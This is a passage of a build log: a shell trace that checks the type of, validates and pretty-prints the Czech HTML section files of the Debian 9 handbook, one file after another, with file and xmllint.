++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.coexistence-with-other-packaging-systems.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.coexistence-with-other-packaging-systems.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.collaborative-work.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.collaborative-work.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.collaborative-work.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.collaborative-work.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.common-procedures.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.common-procedures.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.common-procedures.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.common-procedures.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.computer-layers.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.computer-layers.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.computer-layers.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.computer-layers.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-bootloader.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-bootloader.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-bootloader.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-bootloader.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-misc.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-misc.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-misc.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-misc.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-printing.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-printing.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-printing.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-printing.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.creating-accounts.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.creating-accounts.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.creating-accounts.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.creating-accounts.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.customizing-graphical-interface.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.customizing-graphical-interface.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.customizing-graphical-interface.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.customizing-graphical-interface.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.dealing-with-compromised-machine.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.dealing-with-compromised-machine.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.dealing-with-compromised-machine.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.dealing-with-compromised-machine.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.debian-internals.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.debian-internals.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.debian-internals.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.debian-internals.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.development.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.development.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.development.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.development.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.devuan.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.devuan.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.devuan.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.devuan.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.dhcp.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.dhcp.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.dhcp.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.dhcp.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.dist-upgrade.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.dist-upgrade.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.dist-upgrade.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.dist-upgrade.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.domain-name-servers.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.domain-name-servers.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.domain-name-servers.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.domain-name-servers.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.doudoulinux.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.doudoulinux.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.doudoulinux.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.doudoulinux.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-book.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-book.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-book.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-book.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-electronic-version.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-electronic-version.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-electronic-version.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-electronic-version.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.dynamic-routing.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.dynamic-routing.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.dynamic-routing.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.dynamic-routing.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.filesystem-hierarchy.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.filesystem-hierarchy.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.filesystem-hierarchy.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.filesystem-hierarchy.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.firewall-packet-filtering.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.firewall-packet-filtering.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.firewall-packet-filtering.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.firewall-packet-filtering.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.follow-debian-news.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.follow-debian-news.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.follow-debian-news.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.follow-debian-news.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.foundation-documents.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.foundation-documents.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.foundation-documents.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.foundation-documents.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.ftp-file-server.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.ftp-file-server.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.ftp-file-server.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.ftp-file-server.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-debian.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-debian.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-debian.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-debian.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-this-book.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-this-book.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-this-book.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-this-book.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.graphical-desktops.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.graphical-desktops.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.graphical-desktops.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.graphical-desktops.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.grml.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.grml.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.grml.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.grml.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.hostname-name-service.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.hostname-name-service.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.hostname-name-service.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.hostname-name-service.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.hotplug.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.hotplug.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.hotplug.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.hotplug.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.how-to-migrate.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.how-to-migrate.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.how-to-migrate.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.how-to-migrate.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-ftp-proxy.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-ftp-proxy.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-ftp-proxy.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-ftp-proxy.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-web-server.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-web-server.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-web-server.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-web-server.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.inetd.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.inetd.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.inetd.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.inetd.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.installation-steps.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.installation-steps.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.installation-steps.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.installation-steps.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.ipv6.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.ipv6.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.ipv6.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.ipv6.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.kali.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.kali.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.kali.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.kali.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-compilation.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-compilation.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-compilation.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-compilation.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-installation.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-installation.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-installation.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-installation.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-role-and-tasks.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-role-and-tasks.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-role-and-tasks.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-role-and-tasks.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.knoppix.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.knoppix.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.knoppix.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.knoppix.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.ldap-directory.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.ldap-directory.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.ldap-directory.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.ldap-directory.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.linux-mint.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.linux-mint.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.linux-mint.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.linux-mint.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.main-desktop-tools.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.main-desktop-tools.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.main-desktop-tools.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.main-desktop-tools.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.manipulating-packages-with-dpkg.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.manipulating-packages-with-dpkg.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.manipulating-packages-with-dpkg.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.manipulating-packages-with-dpkg.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.master-plan.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.master-plan.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.master-plan.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.master-plan.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.monitoring.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.monitoring.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.monitoring.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.monitoring.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-config.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-config.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-config.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-config.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-diagnosis-tools.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-diagnosis-tools.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-diagnosis-tools.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-diagnosis-tools.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.nfs-file-server.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.nfs-file-server.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.nfs-file-server.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.nfs-file-server.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.office-suites.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.office-suites.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.office-suites.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.office-suites.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-derivatives.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-derivatives.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-derivatives.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-derivatives.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-security-considerations.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-security-considerations.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-security-considerations.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-security-considerations.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-authentication.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-authentication.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-authentication.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-authentication.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-meta-information.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-meta-information.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-meta-information.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-meta-information.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.power-management.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.power-management.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.power-management.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.power-management.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.quality-of-service.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.quality-of-service.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.quality-of-service.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.quality-of-service.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.quotas.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.quotas.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.quotas.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.quotas.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.raspbian.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.raspbian.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.raspbian.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.raspbian.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.regular-upgrades.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.regular-upgrades.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.regular-upgrades.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.regular-upgrades.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.release-lifecycle.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.release-lifecycle.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.release-lifecycle.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.release-lifecycle.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.remote-login.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.remote-login.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.remote-login.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.remote-login.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.rights-management.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.rights-management.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.rights-management.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.rights-management.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.role-of-distributions.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.role-of-distributions.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.role-of-distributions.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.role-of-distributions.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-clients.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-clients.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-clients.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-clients.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-services.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-services.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-services.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-services.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.searching-packages.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.searching-packages.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.searching-packages.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.searching-packages.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.selected-approach.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.selected-approach.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.selected-approach.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.selected-approach.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.selinux.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.selinux.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.selinux.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.selinux.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.setup-apt-package-repository.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.setup-apt-package-repository.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.setup-apt-package-repository.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.setup-apt-package-repository.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.shell-environment.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.shell-environment.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.shell-environment.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.shell-environment.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.source-package-structure.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.source-package-structure.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.source-package-structure.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.source-package-structure.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.supervision.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.supervision.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.supervision.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.supervision.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.syslog.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.syslog.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.syslog.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.syslog.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.tails.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.tails.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.tails.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.tails.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.tanglu.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.tanglu.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.tanglu.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.tanglu.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.task-scheduling-cron-atd.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.task-scheduling-cron-atd.html
